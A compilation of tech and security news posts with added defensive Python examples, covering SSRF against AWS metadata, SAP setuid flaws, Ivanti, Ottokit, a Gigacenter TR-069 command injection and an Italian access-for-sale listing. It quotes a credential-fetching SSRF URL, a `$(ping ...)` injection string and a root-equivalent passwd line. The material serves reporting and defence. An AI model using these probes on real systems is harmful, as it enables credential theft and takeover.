Does this have any value other than art? It’s hard to say. Perhaps the effect of panning audio on text might give you some insight into your next audio project. Incidentally, panning certainly did what you would expect it to do, as did the pass filters. But some of the effects were a bit surprising. We still want to figure out just what’s happening with the wave folder.

If text isn’t enough for you, try video. Filtering that would probably be pretty entertaining, too. If you want to try your own experiments, we bet you could do it all — wave generation and filtering — in GNU Radio.

youtube.com/embed/47jlny15IEc?…


hackaday.com/2025/04/11/audio-…


This Week in Security: AI Spam, SAP, and Ivanti


AI continues to be used in new and exciting ways… like generating spam messages. Yes, it was inevitable, but we now have spammers using LLMs to generate unique messages that don’t register as spam. AkiraBot is a Python-powered tool designed to evade CAPTCHAs and post sketchy SEO advertisements to web forms and chat boxes around the Internet.

AkiraBot uses a bunch of techniques to look like a legitimate browser, trying to avoid triggering CAPTCHAs. It also runs traffic through a SmartProxy service to spread the apparent source IP around. Some captured logs indicate that of over 400,000 attempted victim sites, 80,000 have successfully been spammed.

SSRF Attacking AWS


March brought a spike in instances of an interesting EC2 attack. F5 Labs has the details, and it’s really pretty simple. Someone is sending requests ending in /?url=hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/, with the hope that the site is vulnerable to a Server Side Request Forgery (SSRF).

That IP address is an interesting one. It’s the location where Amazon EC2 makes the Instance Metadata Service available (IMDSv1). Version 1 of this service completely lacks authentication, so a successful SSRF can expose whatever information that service makes available. And that can include AWS credentials and other important information. The easiest fix is to upgrade the instance to IMDSv2, which does have all the authentication features you’d expect.
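Two defender-side checks for the pattern above, added here as an example and not taken from F5 Labs or the article: a guard that refuses to fetch user-supplied URLs aimed at link-local, loopback or private addresses (the metadata endpoint lives in 169.254.0.0/16), and a scan of access-log lines for the probe. The log lines, client addresses and the `fetch_for_user` wrapper are constructed.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit


def is_blocked_target(url: str) -> bool:
    """Return True when a user-supplied URL must not be fetched server-side.

    Only IP-literal hosts are judged here. A DNS name can still resolve to a
    link-local address (rebinding), so the resolved address must be re-checked
    with the same rule just before the connection is opened.
    """
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not a standard IP literal. Bare decimal or hex integers are alternative
        # encodings of an address rather than names, so treat them as blocked.
        if host.replace(".", "").isdigit() or host.lower().startswith("0x"):
            return True
        return False  # a DNS name: resolve, then re-check the address
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_reserved or ip.is_unspecified)


def fetch_for_user(url: str) -> str:
    """Hypothetical wrapper around the application's outbound fetch."""
    if is_blocked_target(url):
        raise PermissionError(f"refusing to fetch {url!r}")
    return f"would fetch {url}"  # placeholder for the real HTTP client call


# Combined Log Format: client ip, ident, user, [time], "request line", status, size
_CLF = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)"')
_IMDS_PROBE = re.compile(r"169\.254\.169\.254|/latest/meta-data", re.IGNORECASE)


def find_imds_probes(log_lines):
    """Return (client_ip, request_line) for requests that reference the IMDS
    endpoint, after URL-decoding so percent-encoded probes are caught too."""
    hits = []
    for line in log_lines:
        m = _CLF.match(line)
        if m and _IMDS_PROBE.search(unquote(m.group(2))):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample log (documentation address ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Mar/2025:10:01:02 +0000] "GET /?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 512',
    '198.51.100.9 - - [15/Mar/2025:10:02:03 +0000] "GET /?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 88',
    '192.0.2.5 - - [15/Mar/2025:10:03:04 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, req in find_imds_probes(SAMPLE_LOG):
        print(f"IMDS probe from {ip}: {req}")
    print(is_blocked_target("http://169.254.169.254/latest/meta-data/"))  # True
```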

SAP and setuid


Up next is this Anvil Secure report from [Tao Sauvage], about finding vulnerable setuid binaries in the SAP Linux images.

Setuid is a slightly outdated way to allow a less-privileged user to run a binary with elevated privileges. The simplest example is ping, which needs raw socket access to send special ICMP packets. The binary is launched by the user, escalates its privileges to send the packet, and then terminates without actually breaking the security barrier. At least that’s what is supposed to happen. In reality, setuid binaries are a consistent source of privilege escalation problems on Linux. So much so, that it’s now preferred to use the capabilities functionality to achieve this. But that’s fairly new, and many distros just give binaries like ping the setuid bit.

This brings us to SAP’s Linux images, like SAP HANA Express. These images include a small collection of custom setuid binaries, with icmbnd and hostexecstart catching our researcher’s eyes. icmbnd notably has the -f flag to specify the output file for a debug trace. That’s a typical setuid problem, in that a user can specify an oddball location, and the binary will change the system’s state in unexpected ways. It’s an easy denial of service attack, but is there a way to actually get root? It turns out the Linux /etc/passwd file is particularly resilient. Lines that don’t make any sense as password entries are just ignored. Inject a pair of newlines and a single valid passwd entry into the passwd file, and you too can be root on an SAP system.

The hostexecstart vulnerability is a bit more involved. That binary starts and stops the SAP Host Agent on the system. That would be a dead end, except it can also take a SAR archive and upgrade the system agent. [Tao] chased a couple of dead ends regarding library injection and SAR archive signing, before finally using another standard setuid technique, the symbolic link. In this case, link the /etc/passwd file to the local sapcar_output location, and include a malicious passwd line inside a cooked SAR archive. hostexecstart tries to unpack the archive, and outputs the log right into the local sapcar_output file. But that file is really a symbolic link, and it once again clobbers passwd.
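Both setuid bugs above end the same way: attacker-chosen text lands in /etc/passwd and only one well-formed line among the garbage has to survive the parser. An added example, not from the Anvil Secure report: a small auditor that flags the tell-tale signs of that outcome (unparsable lines, blank lines, an extra UID 0 account, a hash stored directly in passwd) over a constructed passwd file. The account names, the stray trace line and the placeholder hash are constructed.

```python
import re

FIELDS = 7  # name:passwd:uid:gid:gecos:home:shell
PLACEHOLDER_PW = ("x", "*", "!", "!!")  # password lives in /etc/shadow
USER_RE = re.compile(r"[a-z_][a-z0-9_-]*\$?")


def audit_passwd(text: str):
    """Return a list of (line_no, reason) findings for passwd-format text.

    A line the libc parser would skip is itself a finding: on a healthy system
    /etc/passwd contains no blank or malformed lines, so their presence is a
    sign that something other than the account tools wrote to the file.
    """
    findings = []
    seen = set()
    for no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            findings.append((no, "blank line"))
            continue
        parts = line.split(":")
        if len(parts) != FIELDS:
            findings.append((no, f"unparsable entry ({len(parts)} fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = parts
        if not USER_RE.fullmatch(name):
            findings.append((no, f"suspicious user name {name!r}"))
        if name in seen:
            findings.append((no, f"duplicate user name {name!r}"))
        seen.add(name)
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((no, f"non-numeric uid/gid for {name!r}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((no, f"extra UID 0 account {name!r}"))
        if pw == "":
            findings.append((no, f"empty password field for {name!r}"))
        elif pw not in PLACEHOLDER_PW:
            findings.append((no, f"password hash stored in passwd for {name!r}"))
    return findings


# Constructed sample: three normal accounts, then what a clobbered file looks
# like (a trace line, a blank line, and one valid root-equivalent entry).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "hostagent:x:1001:1001:constructed service user:/opt/hostagent:/bin/false\n"
    "[Thr 140] Trc: opening trace file\n"
    "\n"
    "evil:$1$PLACEHOLDER$hash:0:0::/root:/bin/bash\n"
)

if __name__ == "__main__":
    for no, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {no}: {reason}")
```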

Google’s Take on End-to-end-encryption


We’re fans of end-to-end encryption around here. If Alice had a message that’s only intended for Bob to see, then it seems only right that Bob is really the only one that can read the message. The reality of modern cryptography is that this is 100% possible via RSA encryption, and the entire variety of asymmetric encryption schemes that followed. The problem with actually using such encryption is that it’s a pain. Between managing keys, getting an email client set up properly, and then actually using the system in practice, end-to-end asymmetric encryption is usually just not worth the hassle for everyday people.

Google feels that pain, and is bringing easy end-to-end encryption to business Gmail accounts. Except, it’s not actually asymmetric encryption. This works using the key access control list (KACL). Here Alice writes a message, and asks the KACL server for a key to use to send it to Bob. The server provides a symmetric key, and Alice encrypts the message. Then when Bob receives the message, he asks the same server for the same key, and the server provides it, allowing him to decrypt the message.

So is this actually end-to-end encryption? Yes, but also no. While this solution does mean that Google never has the key needed to decrypt the message, it also means that whoever is running the KACL server does have that key. But it is better than the alternative. And the technique in use here could be adapted to make true symmetric encryption far easier for end users.
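The KACL exchange described above, as an added toy model that is not Google's code: the KACL server holds a per-message key and an access list, Alice and Bob fetch the same key, the transport only ever carries ciphertext, and the server operator can read everything. The cipher (HMAC-SHA256 in counter mode with an HMAC tag) and the server API are constructed for the illustration and are not the scheme Google uses.

```python
import hashlib
import hmac
import os


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy counter-mode keystream: HMAC-SHA256(key, nonce || counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Return nonce || ciphertext || tag (encrypt-then-MAC, toy construction)."""
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


class KaclServer:
    """Customer-operated key access control list (constructed model):
    message id -> (symmetric key, set of users allowed to fetch it)."""

    def __init__(self):
        self._entries = {}

    def new_message_key(self, sender, recipients):
        msg_id = os.urandom(8).hex()
        self._entries[msg_id] = (os.urandom(32), {sender, *recipients})
        return msg_id, self._entries[msg_id][0]

    def key_for(self, msg_id, user):
        key, allowed = self._entries[msg_id]
        if user not in allowed:
            raise PermissionError(f"{user} is not on the ACL for {msg_id}")
        return key

    def operator_reads(self, msg_id):
        # The point of the section: whoever runs the KACL server holds every key.
        return self._entries[msg_id][0]


def exchange(server, sender, recipients, plaintext):
    """Sender side: ask KACL for a key, encrypt, hand the envelope to the mail
    transport. The transport sees only (msg_id, ciphertext)."""
    msg_id, key = server.new_message_key(sender, recipients)
    return msg_id, encrypt(key, plaintext)


def read(server, user, envelope):
    """Recipient side: fetch the same key from KACL (subject to the ACL), decrypt."""
    msg_id, blob = envelope
    return decrypt(server.key_for(msg_id, user), blob)


if __name__ == "__main__":
    srv = KaclServer()
    env = exchange(srv, "alice", ["bob"], b"meet at noon")
    print("bob reads:", read(srv, "bob", env))
    print("operator reads:", decrypt(srv.operator_reads(env[0]), env[1]))
```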

Ivanti Connect Active Exploit


Google’s Mandiant has announced that Ivanti Connect Secure boxes are under active exploitation via an n-day exploit. This is a buffer overflow that Ivanti discovered internally, and patched in February of this year. The overflow was considered to be strictly limited to denial of service, as the characters written to memory could only be digits and the dot symbol. If that sounds like an IP address, just hang on, and we’ll get there.

It’s apparent that malware actors around the world are actively checking for potential vulnerabilities in Ivanti firmware updates, as the group Mandiant calls UNC5221 has apparently worked out a way to achieve Remote Code Execution with this vulnerability, and is using it to deploy malware on these systems. This is thought to be the same Chinese group that Microsoft appropriately calls Silk Typhoon.

Our friends at watchTowr have dug a bit more into this issue, and found the exact vulnerable code. It’s in HTTP header handling code, where a specific header is first limited to numerals and the period, and then copied into a fixed size buffer. Remember that observation that this sounds like an IP address? The header is X-Forwarded-For, and setting that to a long string of numbers on a vulnerable Ivanti box will indeed trigger a crash in the web binary. There’s no word yet on how exactly that was used to achieve RCE, but we’re very much hoping the rest of the story comes to light, because it’s an impressive feat.

Bits and Bytes


About 100,000 WordPress sites have a real problem. The Ottokit plugin has an authentication bypass issue, where a blank API key can be matched by setting an empty st_authorization header in an incoming request. The flaw was reported privately on April 3rd, and a fixed version was released the same day. But within hours exploitation attempts were seen in the wild.
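The empty-key comparison described above, shown as an added example (not the Ottokit plugin's code) next to a hardened version that refuses an unset secret and a missing header outright and compares in constant time. The header name is the one named above; the stored-key handling is modelled, not copied from the plugin.

```python
import hmac


def authorized_vulnerable(stored_key: str, request_headers: dict) -> bool:
    """Bug class from the report: a plain equality check against a stored key
    that may never have been set. With stored_key == "" an absent or empty
    header compares equal and the request is accepted."""
    provided = request_headers.get("st_authorization", "")
    return provided == stored_key


def authorized_hardened(stored_key: str, request_headers: dict) -> bool:
    """Deny when the integration has no key configured or the header is absent
    or empty; otherwise compare without leaking timing information."""
    provided = request_headers.get("st_authorization")
    if not stored_key or not provided:
        return False
    return hmac.compare_digest(provided.encode(), stored_key.encode())


if __name__ == "__main__":
    unset_key, empty_header = "", {"st_authorization": ""}
    print("vulnerable:", authorized_vulnerable(unset_key, empty_header))  # True
    print("hardened:  ", authorized_hardened(unset_key, empty_header))    # False
```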

Legacy Gigacenter devices expose a TR-069 service on port 6998. That service can be accessed with a simple telnet connection, and the commands entered there are not properly sanitized before being evaluated: anything inside a $() substitution string, such as $(ping -c5 your.ip.address), is executed locally. This makes for an exceedingly trivial remote code execution attack on these devices.

And finally, the Langflow AI workflow tool has a simple remote exploit vulnerability fixed in version 1.3.0. This vulnerability notably allows bypassing authentication through an API endpoint. While Langflow has Python execution by design, doing it while bypassing authentication is a definite problem. You should update to 1.3.0, and don’t expose Langflow to the Internet at all if you can help it.


hackaday.com/2025/04/11/this-w…


Cyber attack on Busitalia: passenger data compromised


A notice has appeared on the official website of Busitalia, the Ferrovie dello Stato group company that runs public transport in the provinces of Padua and Rovigo. Among the updates on new routes and line changes, a statement was published with an unambiguous title: “Notification of a personal data breach”.

In recent days Busitalia was the victim of a cyber attack that compromised the personal data of registered passengers. The incident specifically concerns digital channels such as the Busitalia Veneto app and the season-ticket portal, which thousands of users rely on every day to manage their journeys and tickets.
Customers of the transport services of Busitalia Veneto S.p.A. are informed that the Busitalia Veneto app and the online season-ticket portal, operated by an external supplier acting as Data Processor, have suffered a personal data breach.

Specifically, the supplier reported that a personal data breach (unauthorised exfiltration to an external cloud) was detected at an external data centre, caused by malicious activity by unidentified external actors, which took place between 29 and 30 March 2025.

These facts were communicated on 4 April to Busitalia Veneto S.p.A., as Data Controller for the personal data in question. In detail, the supplier reported that:

· the categories of data subjects involved are: current or potential users/contracting parties/season-ticket holders/customers;

· the categories of personal data affected by the breach are: identity data, contact data, profiling data, location data. Credit card data were not involved, as they are held on the systems of the Payment Service Provider;

· the likely consequences of the breach for data subjects concern a potential loss of confidentiality (the possibility that the data are disclosed beyond what is provided for in the privacy notice or the applicable rules) and loss of availability (inability to access services, malfunctions and difficulty in using services);

· as soon as the breach was detected, the system was made inaccessible for a limited period to allow the appropriate checks and security actions;

· measures have been adopted, and are being adopted, to contain the breach and mitigate its effects, and to prevent similar breaches from recurring.

As a purely precautionary measure, customers are nevertheless advised to change their account password and to pay particular attention to phishing e-mails, suspicious messages and calls, or other requests for personal information.

The Company immediately took action to analyse what happened and to put in place every possible measure to avert the negative consequences of this attack for its Customers. In particular, in addition to this statement, Busitalia Veneto S.p.A. has decided to carry out:

• the preliminary notification to the Italian Data Protection Authority (Garante per la protezione dei dati personali);

• a request for information to the Data Processor, pursuant to Art. 28(3)(f) and (g) of the GDPR, so that it assists Busitalia Veneto S.p.A. in ensuring compliance with Arts. 32 to 36, with particular reference to the handling of the personal data breach and the security measures implemented following it.

For further information about the breach in question, requests may be submitted directly to the company’s institutional contacts listed below:
• privacy@fsbusitaliaveneto.it
• protezionedati@fsbusitalia.it

Finally, we wish to reassure Customers that Busitalia Veneto S.p.A. is committed to protecting and safeguarding all personal data and, in this circumstance too, will act in the interest of and to protect the rights of its Customers.

We will remain in constant contact with the supplier to monitor the outcome of the investigations and to take any further initiative aimed at mitigating the possible effects of what has occurred.
The company promptly informed customers, specifying that the attack potentially exposed sensitive information. However, technical details on the extent of the intrusion, and on which data were actually compromised, have not yet been released. Busitalia stated that it immediately initiated the security procedures required by the GDPR and is working to limit the impact of the incident.

According to initial reconstructions, the unauthorised access to the systems could have allowed the viewing of personal data such as “identity data, contact data, profiling data, location data. Credit card data were not involved, as they are held on the systems of the Payment Service Provider”.

The incident once again highlights the growing vulnerability of IT systems in the public transport sector. In a context where the digitalisation of services is increasingly central, episodes like this underline the urgency of investing in more robust cybersecurity solutions and in greater user awareness.

The article Cyber attack on Busitalia: passenger data compromised comes from il blog della sicurezza informatica.


The Jupiter Ace Remembered


It is hard to imagine that it has been more than four decades since two of the original designers of the Sinclair ZX Spectrum broke off to market the Jupiter Ace. [Nemanja Trifunovic] remembers the tiny computer in a recent post, and we always love to recall the old computers that used TVs for screens and audio tape recorders for mass storage.

One thing we always loved about the Jupiter Ace is that while most computers of the era had Basic as their native tongue, the Ace used Forth. As the post points out, while this may have given it great geek cred, it didn’t do much for sales, and the little machine was history within a year. However, the post also proposes that Forth wasn’t the real reason for the machine’s lack of commercial success.

Why did they pick Forth? Why not? It is efficient and interactive. The only real disadvantage was that Basic was more familiar to more people. Books and magazines of the day showed Basic, not Forth. But, according to the post, the real reason for its early demise was that it was already using outdated hardware from day one.

The Ace provided only 3K of RAM and did not offer color graphics. While this may sound laughable today, it wasn’t totally out of the question in 1978. Unfortunately, the Ace debuted in 1982. There were options that offered much more for just a little less. There is also the argument that as users became less technical, they just wanted to load pre-programmed tapes or cartridges and didn’t really care what language was running the computer.

Maybe, but we did and we can’t help but imagine a future where Forth was the language of choice for personal computers. Given how few of these were made, we see a lot of projects around them or, at least, replicas. Of course, these days that can be as simple as a single chip.


hackaday.com/2025/04/11/the-ju…


Brush Up on Your Trade Craft With This Tiny FM Bug


Would-be spooks and spies, take note: this one-transistor FM transmitter is a circuit you might want to keep in mind for your bugging needs. True, field agents aren’t likely to need to build their own equipment, but how cool a spy would you be if you could?

Luckily, you won’t need too many parts to recreate [Ciprian (YO6DXE)]’s project, most of which could be found in a decently stocked junk bin, or even harvested from e-waste. On the downside, the circuit is pretty fussy, with even minor component value changes causing a major change in center frequency. [Ciprian] had to do a lot of fiddling to get the frequency in the FM band, particularly with the inductor in the LC tank circuit. Even dropping battery voltage shifted the frequency significantly, which required a zener diode to address.

[Ciprian] ran a few tests and managed to get solid copy out to 80 meters range, which is pretty impressive for such a limited circuit. The harmonics, which extend up into the ham bands and possibly beyond, are a bit of a problem; while those could be addressed with a low-pass filter, in practical terms, the power of this little fellow is probably low enough to keep you from getting into serious trouble. Still, it’s best not to push your luck.

While you’re trying your hand at one-transistor circuits, you might want to try [Ciprian]’s one-transistor CW transceiver next.

youtube.com/embed/NxbeOI3g_Gc?…


hackaday.com/2025/04/11/brush-…


An Italian company is about to be breached! Access for sale, with revenue of 10 million dollars


In the past few hours, a particularly interesting listing by the user redblueapple2 has appeared on XSS, the well-known closed Russian-language underground forum. The listing offers administrative access to the infrastructure of an Italian company in the paper manufacturing sector, with declared revenue of around 10 million dollars.

The access on offer includes Domain Admin credentials, with the possibility of obtaining further credentials, remote access via AnyDesk, and a large volume of company data, estimated at no less than 700 GB on a single host, plus numerous databases on other servers. The listing also notes the presence of Trend Micro AV (antivirus) on some systems, but not across the whole network. The affected network comprises several /24 segments (typical IP subnet classes).

The asking price is 10,000 dollars, negotiable.

Analysis of the criticality and of the threat actor’s reliability


If this offer were real and concrete, the consequences for the company would be extremely serious:

  • Total compromise: possession of a Domain Admin account gives absolute control of the network: management of users, devices, access and security policies.
  • Theft and leakage of sensitive data: the 700 GB of data, plus the databases spread across other servers, represent an enormous exposure of industrial, financial and personal data.
  • Ransomware threat: the access being sold could be used to launch devastating ransomware attacks.
  • Persistent attacks (APT): the broad exposure and control over endpoints allow the creation of backdoors and long-term persistence mechanisms.
  • Possible legal repercussions: in the event of a personal data breach (GDPR), the company risks heavy fines and irreparable reputational damage.

The author of the listing, redblueapple2, registered in January 2023 and has low activity (10 posts, no reactions). This raises some doubts:

  • For: a detailed listing, with reasonably precise technical information.
  • Against: little verifiable history; it could be an attempted scam, or a listing of access already compromised by others and resold.

On underground forums, the credibility of Initial Access Brokers (IABs) is fundamental: established sellers publish proof of access (screenshots of internal systems, host lists, etc.), accept escrow (deposit guarantee services) and receive positive feedback. This listing, for now, shows no such public proof.

Conclusions


Initial Access Brokers (IABs) are key figures in the cybercriminal ecosystem. Their job is to obtain access to corporate networks (via phishing, exploits, RDP vulnerabilities, etc.) and resell it to other malicious actors, such as:

  • Ransomware groups, which use the access to encrypt data and demand ransoms.
  • Financial criminals, for theft of banking or credit card data.
  • Industrial spies, for theft of intellectual property.
  • Other brokers, for “chains” of resale.

IABs reduce the time and cost of an attack, allowing specialised groups to concentrate on the most profitable phases (exfiltration, ransomware deployment, extortion).

This kind of listing underlines once again the importance of strengthening internal security, implementing advanced network monitoring, strictly controlling remote access, and keeping antivirus and systems up to date. If confirmed, the access being sold represents a serious threat not only to the specific company but to the entire Italian economic and industrial ecosystem.

The article An Italian company is about to be breached! Access for sale, with revenue of 10 million dollars comes from il blog della sicurezza informatica.


The rebirth of Crack.io: fighting cybercrime is like pulling weeds: if you leave the roots, they grow back


We have often repeated this phrase on Red Hot Cyber: ‘Fighting cybercrime is like pulling weeds: if you leave the roots, they grow back.’ Today, more than ever, that truth is confirmed.

29 January 2025 was a day that left its mark on the digital underground: Crack.io, one of the most popular forums on the hacking and cracking scene, fell under the fire of yet another international operation. Operation Talent, as it was christened, aimed not just to hit an infrastructure but to shut down a community for good. It did not succeed.

Cracked.io (alias Cracked.sh) is back. And, for now, it is here to stay.

After weeks of silence, today Crack.io (now Cracked.sh) is back online. It is not an improvised resurrection: behind the return there was targeted work, a period of reflection and, as stated in the administration’s official message, a major restructuring of the backend, from the Shoutbox through to the payment system, which is currently in transition.

The central point, of course, is security. The seized servers were encrypted. In other words: posts, credentials and private messages did not end up in anyone’s hands. A stroke of luck? No, simple common-sense practice (which, however, is often missing). Still, the admin makes no promises: on the clearweb there are no 100% guarantees. Hence the invitation to change passwords or delete private messages, for anyone who wants to sleep more soundly.

New leadership, old community


The administrator now has a new “face”: @Liars, who has taken the reins of the platform. He will be the point of reference for anyone wanting to restore upgrades or credits purchased after 25 January (the date of the last recoverable backup), or to make new purchases, for now only via private message.

Anyone who knows the world of forums knows that a transition like this can mark a before and an after. But Crack.io is not just a site: it is a community, often controversial, certainly much discussed, but just as resilient.

Continuous fixes are expected in the coming days: every reported bug will be addressed, in an attempt to make the user experience as smooth as possible, in a setting that by its very nature has little that is smooth about it. In the meantime, there is a single watchword: do it by hand. Whoever wants something asks for it directly. Old school? Perhaps. But also one of the few effective strategies in a context where every automated script is potentially an open door.

The return of Crack.io (pardon, Cracked.sh) is not just a technical matter: it is a statement. A statement of resilience, of defiance, and for some also of survival. The cat-and-mouse game between law enforcement and the underground community continues, and today the mouse is back on its feet.

Doubts and suspicions: is Cracked.io run by the feds?


As often happens with such sudden and well-orchestrated “rebirths”, the more controversial hypotheses are not lacking. In a thread published on BreachForums, the user Synaptic raised a serious doubt:

“And it’s probably operated by the feds themselves. I see they’re using a backup and not going from scratch, so that’s something.”

The observation is sharp: why restart from a backup instead of rebuilding from scratch? For some, this may be a potential sign of an undercover operation, the hypothesis being that the entire infrastructure might now be in the hands of the FBI or other government agencies, for tracking and investigation purposes.

Naturally, this is speculation. But in the digital underground, paranoia is not a bug: it is a feature. And the rebirth of Crack.io, too, will have to reckon with trust that needs to be won back, one user at a time.

The real question now is not whether the forum will survive. But for how long.

The article The rebirth of Crack.io: fighting cybercrime is like pulling weeds: if you leave the roots, they grow back comes from il blog della sicurezza informatica.


Farewell Economy 7, a Casualty of the Long Wave Switch-Off


If you paid attention to advertising in 1980s Britain, you were never far from Economy 7. It was the magic way to heat your house for less, using storage heaters which would run at night using cheap electricity, and deliver warmth day-long. Behind it all was an unseen force, a nationwide radio switching signal transmitted using the BBC’s 198 kHz Long Wave service. Now in 2025 the BBC Radio 4 Long Wave service it relies on is to be turned off, rendering the thousands of off-peak electricity meters still installed useless. [Ringway Manchester] is here to tell the tale.

The system was rolled out in the early 1980s and comprised a receiver box which sat alongside your regular electricity meter and switched your off-peak circuit in or out. The control signal was phase-modulated onto the carrier and could convey a series of different energy use programs. Thanks to its low frequency, 198 kHz had the useful property of universal coverage, making it the ideal choice. As we’ve reported in the past, the main transmitter at Droitwich is to be retired due to the unavailability of the high-power vacuum tubes it relies on, so now time’s up for Economy 7 too. The electricity companies have been slow on the uptake despite years of warning, so there’s an unseemly rush to replace those old meters with new smart meters. The video is below the break.

The earliest of broadcast bands may be on the way out, but it’s not entirely over. There might even be a new station on the dial for some people.

youtube.com/embed/DEjDdtCRNlQ?…


hackaday.com/2025/04/10/farewe…


Using Integer Addition to Approximate Float Multiplication


Once the domain of esoteric scientific and business computing, floating point calculations are now practically everywhere. From video games to large language models and their kin, it would seem that a processor without floating point capabilities is pretty much a brick at this point. Yet the truth is that integer-based approximations can be good enough to hit the required accuracy. One example is approximating floating point multiplication with integer addition, which [Malte Skarupke] recently had a poke at, based on an integer-addition-only LLM approach suggested by [Hongyin Luo] and [Wei Sun].

As for the way this works, it does pretty much what it says on the tin: adding the two floating point inputs as integer values, followed by adjusting the exponent. This adjustment factor is what gets you close to the answer, but as the article and comments to it illustrate, there are plenty of issues and edge cases you have to concern yourself with. These include under- and overflow, but also specific floating point inputs.

Unlike in scientific calculations, where even minor inaccuracies tend to propagate and cause much larger errors down the line, graphics and LLMs do not care that much about floating point precision, so the ~7.5% accuracy of the integer approach is good enough. The question is whether it’s truly more efficient, as the paper suggests, rather than a fallback as seen with e.g. integer-only audio decoders for platforms without an FPU.
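An added example, not [Malte Skarupke]'s code or the paper's implementation: the bit-pattern addition described above, for float32 in Python, with the zero, sign, exponent-underflow and exponent-overflow cases handled explicitly, plus a helper that measures the relative error caused by the dropped mantissa cross-term. NaN, infinity and subnormal inputs are left to the caller.

```python
import struct

BIAS_BITS = 127 << 23      # bit pattern of 1.0f: the exponent bias, in place
EXP_MASK = 0x7F800000      # exponent field
MAG_MASK = 0x7FFFFFFF      # everything but the sign
SIGN_BIT = 0x80000000


def f32_bits(x: float) -> int:
    """IEEE 754 single-precision encoding of x as an unsigned 32-bit integer."""
    return struct.unpack("<I", struct.pack("<f", x))[0]


def bits_f32(b: int) -> float:
    return struct.unpack("<f", struct.pack("<I", b & 0xFFFFFFFF))[0]


def approx_mul(a: float, b: float) -> float:
    """Approximate a*b with one integer add on the float32 encodings.

    Adding the encodings adds the exponents (correct, once the bias is removed
    once) and adds the mantissa fractions: (1+ma)(1+mb) = 1+ma+mb+ma*mb, and
    the ma*mb term is what gets dropped. That bounds the relative error of a
    single product at 12.5% (ma = mb = 0.5); products whose mantissa is a
    power of two are exact.
    """
    ba, bb = f32_bits(a), f32_bits(b)
    sign = (ba ^ bb) & SIGN_BIT
    if (ba & MAG_MASK) == 0 or (bb & MAG_MASK) == 0:
        return bits_f32(sign)                 # anything times zero is (signed) zero
    mag = (ba & MAG_MASK) + (bb & MAG_MASK) - BIAS_BITS
    if mag < 0:                               # exponent underflow: flush to zero
        return bits_f32(sign)
    if mag >= EXP_MASK:                       # exponent overflow: saturate to infinity
        return bits_f32(sign | EXP_MASK)
    return bits_f32(sign | mag)


def relative_error(a: float, b: float) -> float:
    exact = a * b
    return abs(approx_mul(a, b) - exact) / abs(exact)


if __name__ == "__main__":
    for a, b in [(2.0, 3.0), (1.5, 1.5), (-2.0, 3.0), (1.25, 1.75), (0.0, 5.0)]:
        print(f"{a} * {b}: approx {approx_mul(a, b)}, exact {a * b}")
    print("underflow:", approx_mul(1e-30, 1e-30), "overflow:", approx_mul(1e30, 1e30))
```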

Since one of the nice things about FP-focused vector processors like GPUs and derivatives (tensor, ‘neural’, etc.) is that they can churn through a lot of data quite efficiently, the benefits of shifting this to the ALU of a CPU and expecting (energy) improvements seem quite optimistic.


hackaday.com/2025/04/10/using-…


Windows on ARM on Arm


While some companies like Apple have gone all-in on the ARM architecture, others are more hesitant to dive into the deep end. For example, Microsoft remains heavily invested in the x86 architecture and although it does have some ARM offerings, a lot of them feel a bit half-baked. So you might question why someone like [Gustave] has spent so much time getting Windows to run on unusual ARM platforms. But we don’t need much of a reason to do something off-the-wall like that around these parts, so take a look at his efforts to get Windows for ARM running on a smartwatch.

The smartwatch in question here is a Pixel Watch 3, which normally runs a closed-source Android implementation called Wear OS. The bootloader can be unlocked, so [Gustave] took that approach to implement a few clever workarounds to get Windows to boot including adding UEFI to the watch. During the process Google updated these devices to Android 15, though, which broke some of these workarounds. The solution at that point was to fake a kernel header and re-implement UEFI and then load Windows (technically Windows PE) onto the watch.

Although this project was released on April 1, and is by [Gustave]’s own admission fairly ridiculous and not something he actually recommends anyone do, he does claim that it’s real and provides everything needed for others to run Windows on their smartwatches if they want to. Perhaps one of our readers will be brave enough to reproduce the results and post about it in the comments. In the meantime, there are a few more open options for smartwatches available if you’re looking for something to tinker with instead.

Thanks to [Ruhan] for the tip!


hackaday.com/2025/04/10/window…


A New Mechanical Keyboard for an Old Computer


As computers age, a dedicated few work towards keeping some of the more interesting ones running. This is often a losing battle of sorts, as the relentless march of time comes for us all, human and machine alike. So as fewer and fewer of these machines remain, new methods are needed to keep them running as best they can. [CallousCoder] demonstrates a way of building up a new keyboard for a Commodore 64 which both preserves the original look and feel of the retro computer and adds some modern touches.

